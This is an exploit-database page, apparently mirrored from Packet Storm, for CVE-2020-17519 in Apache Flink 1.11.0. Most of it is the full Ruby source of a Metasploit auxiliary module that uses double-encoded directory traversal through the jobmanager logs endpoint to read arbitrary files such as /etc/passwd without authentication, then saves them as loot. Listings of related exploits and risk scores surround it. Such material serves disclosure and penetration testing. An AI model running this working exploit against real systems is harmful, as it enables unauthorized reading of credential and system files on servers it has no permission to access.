Apache Flink 1.11.0 Arbitrary File Read / Directory Traversal

🗓️ 08 Jan 2021 00:00:00Reported by SunCSRType

packetstorm🔗 packetstormsecurity.com👁 257 Views

Apache Flink 1.11.0 Arbitrary File Read Vulnerability exploit - Unauthenticated directory traversal

Reporter	Title	Published	Views	Family All 36
GithubExploit	Exploit for Files or Directories Accessible to External Parties in Apache Flink	6 Jan 202102:15	–	githubexploit
GithubExploit	Exploit for Files or Directories Accessible to External Parties in Apache Flink	13 Oct 202117:03	–	githubexploit
GithubExploit	Exploit for Files or Directories Accessible to External Parties in Apache Flink	8 Jan 202106:50	–	githubexploit
GithubExploit	Exploit for Files or Directories Accessible to External Parties in Apache Flink	10 Jan 202101:24	–	githubexploit
GithubExploit	Exploit for Files or Directories Accessible to External Parties in Apache Flink	18 Jan 202102:03	–	githubexploit
GithubExploit	Exploit for Path Traversal in Apache Flink	10 Jan 202101:12	–	githubexploit
Gitee	Exploit for Files or Directories Accessible to External Parties in Apache Flink	5 Oct 202121:50	–	gitee
Gitee	Exploit for Files or Directories Accessible to External Parties in Apache Flink	15 Oct 202116:27	–	gitee
ATTACKERKB	CVE-2020-17519	5 Jan 202100:00	–	attackerkb
Tenable Nessus	Apache Flink local file inclusion Vulnerability (direct check)	9 Feb 202100:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => 'Apache Flink File Read Vulnerability',  
'Description' => %q{  
This module exploits an unauthenticated directory traversal vulnerability  
in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),  
allowing arbitrary file read with the web server privileges  
},  
'Author' =>  
[  
'0rich1 - Ant Security FG Lab', # Vulnerability discovery  
'Hoa Nguyen - Suncsr Team', # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2020-17519'],  
['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],  
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']  
],  
'Privileged' => false,  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' => [['', {}]],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 05 2021'  
  
))  
  
register_options([  
OptInt.new('DEPTH',[true,'Traversal Depth',12]),  
OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])  
])  
end  
  
def run_host(ip)  
traversal = '..%252f' * datastore['DEPTH']  
filename = datastore['FILEPATH'].gsub("/","%252f")  
filename = filename[1, filename.length] if filename =~ /^\//  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),  
})  
  
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200  
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?  
  
print_status('Downloading file...')  
print_line("\n#{res.body}\n")  
fname = datastore['FILEPATH']  
path = store_loot(  
'apache.traversal',  
'text/plain',  
ip,  
res.body,  
fname  
)  
print_good("File saved in: #{path}")  
end  
end  
  
`

08 Jan 2021 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.94331